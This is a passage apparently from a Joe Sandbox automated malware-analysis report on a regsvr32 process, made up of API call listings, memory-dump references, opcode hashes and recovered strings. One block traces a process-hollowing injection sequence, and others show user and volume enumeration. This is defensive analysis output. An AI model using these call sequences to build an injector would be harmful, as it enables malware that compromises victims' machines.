                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04FA11E6
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  APIs
                                                                  • SetThreadStackGuarantee.KERNEL32(00005000), ref: 6C8F9AB5
                                                                    • Part of subcall function 6C85AC40: HeapFree.KERNEL32(00000000,0000000C), ref: 6C8E9FA8
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: FreeGuaranteeHeapStackThread
                                                                  • String ID:
                                                                  • API String ID: 4181682901-0
                                                                  APIs
                                                                  • WSAStartup.WS2_32(00000202), ref: 0264429E
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Startup
                                                                  • String ID:
                                                                  • API String ID: 724789610-0
                                                                  APIs
                                                                  • GetSystemInfo.KERNEL32(?,?,?,?,?,?,00000000), ref: 6C8D2AB0
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: InfoSystem
                                                                  • String ID:
                                                                  • API String ID: 31276548-0
                                                                  • Opcode ID: bb3ace0487df3395af6e142a50a24a2429191e2a758ef5998244877c02b75c0e
                                                                  • Instruction ID: 750695ebe2060543845e0666f87e80b0997452a19585fe25b5ff8181bdb9efd0
                                                                  • Opcode Fuzzy Hash: bb3ace0487df3395af6e142a50a24a2429191e2a758ef5998244877c02b75c0e
                                                                  • Instruction Fuzzy Hash: 8BF05E70E083498BDF20DF68C5806DABBF4EF1A214F25D529E888A7740F730A9D0C790
                                                                  APIs
                                                                  • WSAStartup.WS2_32(00000202), ref: 0264429E
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Startup
                                                                  • String ID:
                                                                  • API String ID: 724789610-0
                                                                  • Opcode ID: 0429ca9435e17d53173b72cadac39724404bbaf536fd5cfdb57285a3ec162203
                                                                  • Instruction ID: 8599884b29642a7c660b2197ea9699e1dff8fa14854332b23c92cfbf714da880
                                                                  • Opcode Fuzzy Hash: 0429ca9435e17d53173b72cadac39724404bbaf536fd5cfdb57285a3ec162203
                                                                  • Instruction Fuzzy Hash: 1EE02674E4020CABD705EFA5E90764EB7F9DB09310F40046DF94687240DEB06A248B9A
                                                                  APIs
                                                                  • memcmp.MSVCRT(?,?), ref: 6C8523BB
                                                                    • Part of subcall function 6C9328C0: memcmp.MSVCRT(00000001,00000001,?), ref: 6C932A6F
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memcmp
                                                                  • String ID:
                                                                  • API String ID: 1475443563-0
                                                                  • Opcode ID: ce8937f02912817341e87c3ba404371270e2430e42243c8ee3c5e03d1de17ca1
                                                                  • Instruction ID: 8f6c4958f4abc1e73a8a9cec9028b1fc83092e7930523d1ab0ca0ac3a101b283
                                                                  • Opcode Fuzzy Hash: ce8937f02912817341e87c3ba404371270e2430e42243c8ee3c5e03d1de17ca1
                                                                  • Instruction Fuzzy Hash: 6E41B0B3D193201AD371852489447AFBBA59BC2378F8C4F2DF8D403681DAF9D85087D2
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID:
                                                                  • API String ID: 2221118986-0
                                                                  • Opcode ID: f056032065a7cb2b143405f6329892ec2db737aabf561845cb83b8acead691b4
                                                                  • Instruction ID: 5fdfd4a647461b66a7ea26e207d86ae5d8bfdbe936465d2c2e1ef6ae15dfb2ff
                                                                  • Opcode Fuzzy Hash: f056032065a7cb2b143405f6329892ec2db737aabf561845cb83b8acead691b4
                                                                  • Instruction Fuzzy Hash: 21314B31B042064BDB3CCA6C8D657BEB672ABC5314F144A3DD5169BBD0F77195048BA1
                                                                  APIs
                                                                  • HeapFree.KERNEL32(00000000,0000000C), ref: 6C8E9FA8
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: FreeHeap
                                                                  • String ID:
                                                                  • API String ID: 3298025750-0
                                                                  • Opcode ID: cf9517879a36872fc609b8e078a89f4a755ac12bcf3262c5f263ea79d3dd647f
                                                                  • Instruction ID: afe298288e486bd80390dc4d68a12d184d21713b3c52fb3fb7291ebfd66e04a3
                                                                  • Opcode Fuzzy Hash: cf9517879a36872fc609b8e078a89f4a755ac12bcf3262c5f263ea79d3dd647f
                                                                  • Instruction Fuzzy Hash: 35D06734248349AFD710DE58C984A5AF7E9BB59714F108814F95887A50C770FE94DB45
                                                                  APIs
                                                                  • HeapAlloc.KERNEL32(027D0000,?,?,?,6C8E9F6C), ref: 6C8FAFC5
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: AllocHeap
                                                                  • String ID:
                                                                  • API String ID: 4292702814-0
                                                                  • Opcode ID: 67cc9dbce748397726262a98fe01b0d78b7edcf3bde6fcbfb087cd048a6a3fe9
                                                                  • Instruction ID: 9a88eec1d9c88d201bb2e05f10adf0f6eb805250e36fbf22c161ea3dbf89ad47
                                                                  • Opcode Fuzzy Hash: 67cc9dbce748397726262a98fe01b0d78b7edcf3bde6fcbfb087cd048a6a3fe9
                                                                  • Instruction Fuzzy Hash: 03D012B02043496BAF149E75DC44CB7336CEB9496C7208914F82C8BB44DB30F9558574
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: strlen
                                                                  • String ID:
                                                                  • API String ID: 39653677-0
                                                                  • Opcode ID: 22b11ded44ba08c8d9a396ebef7d7ae0f47604ff01838866b54777b4a2b22bde
                                                                  • Instruction ID: 2d91dd238d420f2a8f7fa2e7005c4734e6cb0422047ddb77e0409acb40ce4177
                                                                  • Opcode Fuzzy Hash: 22b11ded44ba08c8d9a396ebef7d7ae0f47604ff01838866b54777b4a2b22bde
                                                                  • Instruction Fuzzy Hash: B702E2725087518FD710CF29C044796BBE2AF86318F09C6AED8A84BB91C376E949CF81
                                                                  APIs
                                                                  • GetIfTable2.IPHLPAPI(00000000), ref: 6C86D3C2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Table2
                                                                  • String ID: $$cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs
                                                                  • API String ID: 2184214033-2784426548
                                                                  • Opcode ID: 2ed534b59337a70987788e7a9b6ba573cf82a0c9b84f3f500eb74d3c707a7839
                                                                  • Instruction ID: 60839a1fb1a04251cbd0e6f6a6da86ad92a2d3aa0756b53c72f0f5619bf0f3a5
                                                                  • Opcode Fuzzy Hash: 2ed534b59337a70987788e7a9b6ba573cf82a0c9b84f3f500eb74d3c707a7839
                                                                  • Instruction Fuzzy Hash: 4CD2A1759087418FD721CF29C980B9AF7E1BFD9304F148A2EE89897751E770E944CB92
                                                                  APIs
                                                                  • NetUserEnum.NETAPI32(00000000,00000000,00000002,00000000,000000FF,00000000,?,00000000), ref: 6C8704C6
                                                                  • NetUserGetInfo.NETAPI32(00000000,?,00000017,00000000,00000000,00000000,00000002,00000000,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000002), ref: 6C870522
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: User$EnumInfo
                                                                  • String ID:
                                                                  • API String ID: 2388768862-0
                                                                  • Opcode ID: 268f8394c78054a691848e5af2bf80472125b1f25001ff6e098ce8ae99b8adde
                                                                  • Instruction ID: 61ce1feaf7318e5c3e6ab5f184242dace51ec477b7b8ea17fd33778a45690b9d
                                                                  • Opcode Fuzzy Hash: 268f8394c78054a691848e5af2bf80472125b1f25001ff6e098ce8ae99b8adde
                                                                  • Instruction Fuzzy Hash: 70125C71D006599BDB20CFA8C984BDEBBB4BF59318F144529E818FB741EB369944CBA0
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 02635859
                                                                  • _memset.LIBCMT ref: 02635878
                                                                  • _memset.LIBCMT ref: 026358AD
                                                                  • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 026358C1
                                                                    • Part of subcall function 026359F0: _vswprintf_s.LIBCMT ref: 02635A01
                                                                  • GetFileAttributesA.KERNEL32(?), ref: 026358F0
                                                                  • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 02635938
                                                                  • VirtualAllocEx.KERNEL32(?,00000000,0264BF98,00003000,00000040,02645084), ref: 0263595E
                                                                  • WriteProcessMemory.KERNEL32(?,00000000,?,0264BF98,00000000,?,00000000,0264BF98,00003000,00000040,02645084), ref: 02635978
                                                                  • GetThreadContext.KERNEL32(?,?,?,00000000,?,0264BF98,00000000,?,00000000,0264BF98,00003000,00000040,02645084), ref: 02635997
                                                                  • SetThreadContext.KERNEL32(?,00010007,?,00000000,?,0264BF98,00000000,?,00000000,0264BF98,00003000,00000040,02645084), ref: 026359B2
                                                                  • ResumeThread.KERNEL32(?,?,00000000,?,0264BF98,00000000,?,00000000,0264BF98,00003000,00000040,02645084), ref: 026359D1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
                                                                  • String ID: D
                                                                  • API String ID: 2170139861-2746444292
                                                                  • Opcode ID: aeddd0d94e8c347bbaadca76abf855ba324d9b3ab869e140c6fe2a1d0112047c
                                                                  • Instruction ID: 398253231085f9e5bcc7341f5f2feec5a7ad1d435fc0e40347548bb92f9b5013
                                                                  • Opcode Fuzzy Hash: aeddd0d94e8c347bbaadca76abf855ba324d9b3ab869e140c6fe2a1d0112047c
                                                                  • Instruction Fuzzy Hash: 5D4177B4A40348ABE725DB60DC45FAE77B8EF14B00F40459DB64EA72C0DBB0AA848F54
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,6C8F9007,?,00001000,?,?,6C8DC9EC,?,6C8F9007,?,?,00000000,00000000,FFFFFFF4), ref: 6C8F91D5
                                                                  • WriteConsoleW.KERNEL32(00000008,?,00000000,00000000,00000000,0000FDE9,00000008,?,6C8F9007,?,00001000,?,?,6C8DC9EC,?,6C8F9007), ref: 6C8F9204
                                                                  • WriteConsoleW.KERNEL32(00000008,?,00000001,6C8F9007,00000000,00000008,?,00000000,00000000,00000000,0000FDE9,00000008,?,6C8F9007,?,00001000), ref: 6C8F9254
                                                                  • GetLastError.KERNEL32(00000008,?,00000000,00000000,00000000,0000FDE9,00000008,?,6C8F9007,?,00001000,?,?,6C8DC9EC,?,6C8F9007), ref: 6C8F9463
                                                                  • GetStdHandle.KERNEL32(000000F6,?,6C8F9007,?,6C8DC9EC,6C983DD8,00000000,6C8F9007,00000000,?,6C983D78,6C8DC9EC,00001000,6C983DC8,6C983DB0,6C983DB8), ref: 6C8F9525
                                                                  • GetLastError.KERNEL32(000000F6,?,6C8F9007,?,6C8DC9EC,6C983DD8,00000000,6C8F9007,00000000,?,6C983D78,6C8DC9EC,00001000,6C983DC8,6C983DB0,6C983DB8), ref: 6C8F9533
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ConsoleErrorLastWrite$ByteCharHandleMultiWide
                                                                  • String ID:
                                                                  • API String ID: 1103291878-0
                                                                  • Opcode ID: cb9620cf1e38bf8b8ac5f623efb007e1dab64b06ab001c72852a0644d47d6cb1
                                                                  • Instruction ID: c0825a82e9dbf703876cbd64c69d17220af370c696fed949925bf80ace863c1c
                                                                  • Opcode Fuzzy Hash: cb9620cf1e38bf8b8ac5f623efb007e1dab64b06ab001c72852a0644d47d6cb1
                                                                  • Instruction Fuzzy Hash: D5F1BB319153559ADB228F38C8417ABB7B4BFA6384F14CB19F8E4B7A81E730D986C750
                                                                  APIs
                                                                  • NtWriteFile.NTDLL ref: 6C8F07EF
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,00000000,00000103,?,?,00000000,00000000), ref: 6C8F07FE
                                                                  • RtlNtStatusToDosError.NTDLL ref: 6C8F081D
                                                                  • GetConsoleMode.KERNEL32(?,00000000), ref: 6C8F08B3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ConsoleErrorFileModeObjectSingleStatusWaitWrite
                                                                  • String ID: -pty$\$\
                                                                  • API String ID: 1126159181-1451992680
                                                                  • Opcode ID: 66065c0461c0d5769333c36c63aaa93c9f2de68e00b23f0a28fb18984d1db98b
                                                                  • Instruction ID: 4fde6108ec69e93c403421c55efb075833ff2e22276eb1d0b695a8fd0478d9a1
                                                                  • Opcode Fuzzy Hash: 66065c0461c0d5769333c36c63aaa93c9f2de68e00b23f0a28fb18984d1db98b
                                                                  • Instruction Fuzzy Hash: 7651A1B1A05308AFE710CF54CD84BDFBBF4AF85358F10452DE868A7380D774A94A8B96
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: malloc
                                                                  • String ID:
                                                                  • API String ID: 2803490479-0
                                                                  • Opcode ID: ce51ab4f1c2c29a7873d1ca3e9d58189d24f57dfe05f9193a3e02d68419e6229
                                                                  • Instruction ID: e25c24fdc050f5da028893da436af6396b3d3443b3fe9b29aac5918cf787296e
                                                                  • Opcode Fuzzy Hash: ce51ab4f1c2c29a7873d1ca3e9d58189d24f57dfe05f9193a3e02d68419e6229
                                                                  • Instruction Fuzzy Hash: 621258B16097068FC304CF19C48065AB7E6BF88758F55CA2DE899E7B54E730ED09CB92
                                                                  APIs
                                                                  • memset.MSVCRT ref: 6C86FD27
                                                                  • FindFirstVolumeW.KERNEL32(00000000,00000105), ref: 6C86FD35
                                                                  • memcpy.MSVCRT(00000000,00000000,FFFFFFFE,00000000,00000105), ref: 6C86FE3D
                                                                  • FindNextVolumeW.KERNEL32(?,?,00000105,?,?,?,?,00000000,00000105), ref: 6C86FEA7
                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,?), ref: 6C87013B
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
